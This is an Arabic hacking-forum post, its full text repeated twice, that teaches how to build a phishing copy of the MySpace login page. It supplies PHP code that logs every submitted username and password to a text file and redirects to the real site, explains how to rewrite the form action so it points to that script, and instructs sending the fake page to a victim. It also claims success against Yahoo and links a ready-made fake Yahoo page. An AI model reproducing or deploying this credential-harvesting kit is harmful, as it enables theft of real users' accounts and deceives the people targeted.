mr.yOoyOo الخميس أغسطس 20, 2009 1:19 pmالسلام عليكم ورحمة الله
احبيتي الاعزة في منتديات جيوش الهكر
اخوكم صحيح مبتديء بس قريت هالدرس وعجبني اترجمة وانقلة الكم
طبعا بعد نجاح تطبيق الدرس :-
حتى تصنع صفحة مزورة لاي موقع ما يجب ان تمتلك موقع خاص بك على الانترنت وكثيرة هي المواقع
واني لهذا الخصوص انصح بهذا الموقع
www.badwaresite.www
وراح يصير الشرح عليه.
ثاني خطوة تفتح صفحة الموقع الي تريد تصنع مثلها مزور وتنتبه انه مايكون انتة مسجل دخول بالموقع
يعني معلومات الدخول كيوزر نيم او باسوورد فارغة كان يكون تريد تسوي لمنتدى انتة مسجل بيه اول خطوة تسجل خروج من هالمنتدى وتفتح الصفحة اعتقد واضحة هالنقطة.
وتفتح كود الصفحة اما بالضغط على CTRL-U اذا كان متصفحك فايرفوكس
او كلك يمين بالصفحة وتختار view source في حالة الانترنت اكسبلورر
وتحفظ الكود كملف txt باسم مثلا LOGIN.php
تفتح ملف txt جديد وتسميه phish.php وتضع فيه الكود التالي:-
طبعا الشرح هنا على موقع ماي سبيس الشهير
يعني لماتسوي لموقع ثاني تغير الرابط حسب موقعك وتغير اللازم بالشرحز
كود PHP:
<?php
header("Location: http://www.myspace.com");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
هسه تسوي بحث بملف الموقع الي خزنته بالضغط طبعا ctrl+f
وتبحث عن الكود التالي او مايشابهه بنسبه كبيره لان هو هذا كود تسجيل الدخول للموقع بهالصيغة يصير:-
كود PHP:
الموضوع الأصلى من هنا: منتديات جيوش الهكرز http://www.aljyyosh.com/vb/f32/803/
<form action="https://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
ونستبدلة بالكود الخاص بينة الي يخلي بدل ميدز الباسورد للموقع يجيبه للموقع المزور الي سويناه:
كود PHP:
<form action="phish.php" method="get" id="LoginForm" name="aspnetForm">
اذا ركزتو بالكود راح تلاحظو الاكشن بدل من موقع الماي سبيس راح يصير الاكشن على phish.php الي سويناها ونستطيع تغير الاسماء للملفات بس بشرط نغيرها ايضا بالاكواد الي صنعناها.
اخر خطوة وبعد تغير اللازم
نذهب للموقع الخاص بينه ونصنع صفحتين وطبعا تصميم الصفحتين الي سويناهم اقصد
login.php
and
phish.php
تقوم بارسال صفحة login الى الضحية بعد تسجيله لدخول راح تلاكي ملف جديد انضاف بموقعك اسمه
password.txt
ركز شوية راح تلاكي اليوزر والباسورد
جربت الطريقة على الياهو ونجحت
وهذا كود صفحة الياهو للي يحب جاهز :- في هذه الصفحة المزورة
فقط اعرض الكود كما اخبرتك وانسخه لموقعك
http://h1.badwaresite.www/freelove/login.php
أتمنى ان اكون قدمت شيء بسيط لخدمتكم
تحياتي
احبيتي الاعزة في منتديات جيوش الهكر
اخوكم صحيح مبتديء بس قريت هالدرس وعجبني اترجمة وانقلة الكم
طبعا بعد نجاح تطبيق الدرس :-
حتى تصنع صفحة مزورة لاي موقع ما يجب ان تمتلك موقع خاص بك على الانترنت وكثيرة هي المواقع
واني لهذا الخصوص انصح بهذا الموقع
www.badwaresite.www
وراح يصير الشرح عليه.
ثاني خطوة تفتح صفحة الموقع الي تريد تصنع مثلها مزور وتنتبه انه مايكون انتة مسجل دخول بالموقع
يعني معلومات الدخول كيوزر نيم او باسوورد فارغة كان يكون تريد تسوي لمنتدى انتة مسجل بيه اول خطوة تسجل خروج من هالمنتدى وتفتح الصفحة اعتقد واضحة هالنقطة.
وتفتح كود الصفحة اما بالضغط على CTRL-U اذا كان متصفحك فايرفوكس
او كلك يمين بالصفحة وتختار view source في حالة الانترنت اكسبلورر
وتحفظ الكود كملف txt باسم مثلا LOGIN.php
تفتح ملف txt جديد وتسميه phish.php وتضع فيه الكود التالي:-
طبعا الشرح هنا على موقع ماي سبيس الشهير
يعني لماتسوي لموقع ثاني تغير الرابط حسب موقعك وتغير اللازم بالشرحز
كود PHP:
<?php
header("Location: http://www.myspace.com");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
هسه تسوي بحث بملف الموقع الي خزنته بالضغط طبعا ctrl+f
وتبحث عن الكود التالي او مايشابهه بنسبه كبيره لان هو هذا كود تسجيل الدخول للموقع بهالصيغة يصير:-
كود PHP:
الموضوع الأصلى من هنا: منتديات جيوش الهكرز http://www.aljyyosh.com/vb/f32/803/
<form action="https://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
ونستبدلة بالكود الخاص بينة الي يخلي بدل ميدز الباسورد للموقع يجيبه للموقع المزور الي سويناه:
كود PHP:
<form action="phish.php" method="get" id="LoginForm" name="aspnetForm">
اذا ركزتو بالكود راح تلاحظو الاكشن بدل من موقع الماي سبيس راح يصير الاكشن على phish.php الي سويناها ونستطيع تغير الاسماء للملفات بس بشرط نغيرها ايضا بالاكواد الي صنعناها.
اخر خطوة وبعد تغير اللازم
نذهب للموقع الخاص بينه ونصنع صفحتين وطبعا تصميم الصفحتين الي سويناهم اقصد
login.php
and
phish.php
تقوم بارسال صفحة login الى الضحية بعد تسجيله لدخول راح تلاكي ملف جديد انضاف بموقعك اسمه
password.txt
ركز شوية راح تلاكي اليوزر والباسورد
جربت الطريقة على الياهو ونجحت
وهذا كود صفحة الياهو للي يحب جاهز :- في هذه الصفحة المزورة
فقط اعرض الكود كما اخبرتك وانسخه لموقعك
http://h1.badwaresite.www/freelove/login.php
أتمنى ان اكون قدمت شيء بسيط لخدمتكم
تحياتي
